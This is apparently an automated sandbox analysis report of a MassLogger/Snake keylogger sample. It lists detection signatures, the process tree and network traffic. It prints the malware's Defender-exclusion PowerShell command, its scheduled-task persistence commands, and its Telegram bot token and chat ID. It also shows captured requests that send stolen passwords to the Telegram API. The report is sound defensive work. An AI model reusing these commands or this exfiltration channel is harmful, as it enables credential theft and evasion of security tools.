
Windows Analysis Report
UOEAjWmusE.exe

Overview

General Information

Sample name: UOEAjWmusE.exe (renamed because the original name is a hash value)
Original sample name: 24d731e94d2250181a75707739b145da491194c5a6bfd29fd93ab276bb106601.exe
Analysis ID: 1631784
MD5: ef9af793956c447b2763842821d3fbad
SHA1: 99f2309031063e0231a4d278b92d07f6ba87162a
SHA256: 24d731e94d2250181a75707739b145da491194c5a6bfd29fd93ab276bb106601
Tags: exe, user-adrian__luca

Detection

MSIL Logger, MassLogger RAT
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected MSIL Logger
Yara detected MassLogger RAT
Yara detected Telegram RAT
.NET source code contains potential unpacker
.NET source code references suspicious native API functions
Adds a directory exclusion to Windows Defender
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • UOEAjWmusE.exe (PID: 6704 cmdline: "C:\Users\user\Desktop\UOEAjWmusE.exe" MD5: EF9AF793956C447B2763842821D3FBAD)
    • powershell.exe (PID: 2108 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 6392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 3184 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 2112 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 4664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • UOEAjWmusE.exe (PID: 2304 cmdline: "C:\Users\user\Desktop\UOEAjWmusE.exe" MD5: EF9AF793956C447B2763842821D3FBAD)
    • UOEAjWmusE.exe (PID: 2992 cmdline: "C:\Users\user\Desktop\UOEAjWmusE.exe" MD5: EF9AF793956C447B2763842821D3FBAD)
    • MpCmdRun.exe (PID: 2304 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 1360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • gJdonuKfIrqN.exe (PID: 3552 cmdline: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe MD5: EF9AF793956C447B2763842821D3FBAD)
    • schtasks.exe (PID: 1224 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • gJdonuKfIrqN.exe (PID: 1616 cmdline: "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe" MD5: EF9AF793956C447B2763842821D3FBAD)
  • cleanup
{"C2 url": "https://api.telegram.org/bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0", "Telegram Chatid": "7791468448"}
Yara matches in memory dumps (Source, Rule, Description, Author, Strings):
Source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Author: Joe Security
Source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Author: Joe Security
Source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security
Source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Author: unknown, Strings:
  • 0xdfb7:$a1: get_encryptedPassword
  • 0xe2df:$a2: get_encryptedUsername
  • 0xdd52:$a3: get_timePasswordChanged
  • 0xde73:$a4: get_passwordField
  • 0xdfcd:$a5: set_encryptedPassword
  • 0xf929:$a7: get_logins
  • 0xf5da:$a8: GetOutlookPasswords
  • 0xf3cc:$a9: StartKeylogger
  • 0xf879:$a10: KeyLoggerEventArgs
  • 0xf429:$a11: KeyLoggerEventArgsEventHandler
(41 entries in total; only the first five are shown)
Yara matches in unpacked PE files (Source, Rule, Description, Author, Strings):
Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, Rule: JoeSecurity_MassLogger, Description: Yara detected MassLogger RAT, Author: Joe Security
Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Author: Joe Security
Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, Rule: JoeSecurity_MSILLogger, Description: Yara detected MSIL Logger, Author: Joe Security
Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Author: Joe Security
Source: 7.2.UOEAjWmusE.exe.400000.0.unpack, Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Author: unknown, Strings:
  • 0xf1b7:$a1: get_encryptedPassword
  • 0xf4df:$a2: get_encryptedUsername
  • 0xef52:$a3: get_timePasswordChanged
  • 0xf073:$a4: get_passwordField
  • 0xf1cd:$a5: set_encryptedPassword
  • 0x10b29:$a7: get_logins
  • 0x107da:$a8: GetOutlookPasswords
  • 0x105cc:$a9: StartKeylogger
  • 0x10a79:$a10: KeyLoggerEventArgs
  • 0x10629:$a11: KeyLoggerEventArgsEventHandler
(61 entries in total; only the first five are shown)

                  System Summary

Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UOEAjWmusE.exe", ParentImage: C:\Users\user\Desktop\UOEAjWmusE.exe, ParentProcessId: 6704, ParentProcessName: UOEAjWmusE.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", ProcessId: 2108, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UOEAjWmusE.exe", ParentImage: C:\Users\user\Desktop\UOEAjWmusE.exe, ParentProcessId: 6704, ParentProcessName: UOEAjWmusE.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", ProcessId: 2108, ProcessName: powershell.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe, ParentImage: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe, ParentProcessId: 3552, ParentProcessName: gJdonuKfIrqN.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp", ProcessId: 1224, ProcessName: schtasks.exe
Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UOEAjWmusE.exe", ParentImage: C:\Users\user\Desktop\UOEAjWmusE.exe, ParentProcessId: 6704, ParentProcessName: UOEAjWmusE.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", ProcessId: 2112, ProcessName: schtasks.exe
Source: Process started, Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements), Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\UOEAjWmusE.exe", ParentImage: C:\Users\user\Desktop\UOEAjWmusE.exe, ParentProcessId: 6704, ParentProcessName: UOEAjWmusE.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe", ProcessId: 2108, ProcessName: powershell.exe

                  Persistence and Installation Behavior

Source: Process started, Author: Joe Security, Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\UOEAjWmusE.exe", ParentImage: C:\Users\user\Desktop\UOEAjWmusE.exe, ParentProcessId: 6704, ParentProcessName: UOEAjWmusE.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp", ProcessId: 2112, ProcessName: schtasks.exe

Suricata IDS alerts:
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T15:48:35.899643+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49693 | 149.154.167.220 | 443 | TCP
2025-03-07T15:48:40.403148+0100 | 2057744 | 1 | Malware Command and Control Activity Detected | 192.168.2.12 | 49694 | 149.154.167.220 | 443 | TCP
2025-03-07T15:48:25.365310+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49689 | 193.122.130.0 | 80 | TCP
2025-03-07T15:48:29.990241+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49691 | 193.122.130.0 | 80 | TCP
2025-03-07T15:48:32.865246+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49689 | 193.122.130.0 | 80 | TCP
2025-03-07T15:48:37.693395+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.12 | 49691 | 193.122.130.0 | 80 | TCP
2025-03-07T15:48:35.252587+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.12 | 49693 | 149.154.167.220 | 443 | TCP
2025-03-07T15:48:39.712501+0100 | 1810008 | 1 | Potentially Bad Traffic | 192.168.2.12 | 49694 | 149.154.167.220 | 443 | TCP


                  AV Detection

Source: UOEAjWmusE.exe, Avira: detected
Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe, Avira: detection malicious, Label: TR/AD.SnakeStealer.zxgto
Source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0", "Telegram Chatid": "7791468448"}
Source: gJdonuKfIrqN.exe.1616.12.memstrmin, Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendMessage"}
Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe, ReversingLabs: Detection: 78%
Source: UOEAjWmusE.exe, Virustotal: Detection: 74%
Source: UOEAjWmusE.exe, ReversingLabs: Detection: 78%
Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability

                  Location Tracking

Source: unknown, DNS query: name: reallyfreegeoip.org
Source: UOEAjWmusE.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown, HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49690 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49692 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49693 version: TLS 1.2
Source: unknown, HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.12:49694 version: TLS 1.2
Source: UOEAjWmusE.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: gATZ.pdbSHA256%, source: UOEAjWmusE.exe, gJdonuKfIrqN.exe.0.dr
Source: Binary string: gATZ.pdb, source: UOEAjWmusE.exe, gJdonuKfIrqN.exe.0.dr
Source: C:\Users\user\Desktop\UOEAjWmusE.exe, Code function: 4x nop then jmp 01165782h, 7_2_01165358
Source: C:\Users\user\Desktop\UOEAjWmusE.exe, Code function: 4x nop then jmp 011651B9h, 7_2_01164F08
Source: C:\Users\user\Desktop\UOEAjWmusE.exe, Code function: 4x nop then jmp 01165782h, 7_2_011656AF
Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe, Code function: 4x nop then jmp 01115782h, 12_2_01115363
Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe, Code function: 4x nop then jmp 011151B9h, 12_2_01114F08
Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe, Code function: 4x nop then jmp 01115782h, 12_2_011156AF

                  Networking

Source: Network traffic, Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.12:49693 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.12:49693 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.12:49694 -> 149.154.167.220:443
Source: Network traffic, Suricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.12:49694 -> 149.154.167.220:443
Source: unknown, DNS query: name: api.telegram.org
Source: global traffic, HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    POST /bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendDocument?chat_id=7791468448&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd5d5d38c24983
    Host: api.telegram.org
    Content-Length: 1088
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    POST /bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendDocument?chat_id=7791468448&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd5d5d3ba3d77d
    Host: api.telegram.org
    Content-Length: 1088
    Connection: Keep-Alive
Source: Joe Sandbox View, IP Address: 149.154.167.220
Source: Joe Sandbox View, IP Address: 104.21.16.1
Source: Joe Sandbox View, IP Address: 104.21.16.1
Source: Joe Sandbox View, IP Address: 193.122.130.0
Source: Joe Sandbox View, JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown, DNS query: name: checkip.dyndns.org
Source: unknown, DNS query: name: reallyfreegeoip.org
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49689 -> 193.122.130.0:80
Source: Network traffic, Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.12:49691 -> 193.122.130.0:80
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: unknown, HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49690 version: TLS 1.0
Source: unknown, HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.12:49692 version: TLS 1.0
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic, HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
    Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic, HTTP traffic detected:
    GET / HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
    Host: checkip.dyndns.org
Source: global traffic, DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic, DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic, DNS traffic detected: DNS query: api.telegram.org
Source: unknown, HTTP traffic detected:
    POST /bot7589629165:AAFGWVS6kZwkIgQczX-gx5tFmWDO1tfayU0/sendDocument?chat_id=7791468448&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
    Content-Type: multipart/form-data; boundary================8dd5d5d38c24983
    Host: api.telegram.org
    Content-Length: 1088
    Connection: Keep-Alive
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://api.telegram.org
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://api.telegram.orgl
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.com
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.coml
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DC5000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.org
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.org/
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.org/l
Source: UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.org/q
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DD1000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://checkip.dyndns.orgl
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://reallyfreegeoip.org
Source: UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002D5D000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002DED000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://reallyfreegeoip.orgl
Source: UOEAjWmusE.exe, 00000000.00000002.1331909369.0000000002F9B000.00000004.00000800.00020000.00000000.sdmp, UOEAjWmusE.exe, 00000007.00000002.3767694744.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 00000009.00000002.1375618347.00000000024D2000.00000004.00000800.00020000.00000000.sdmp, gJdonuKfIrqN.exe, 0000000C.00000002.3768174332.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UOEAjWmusE.exe, gJdonuKfIrqN.exe.0.dr, String found in binary or memory: http://tempuri.org/DataSet1.xsd
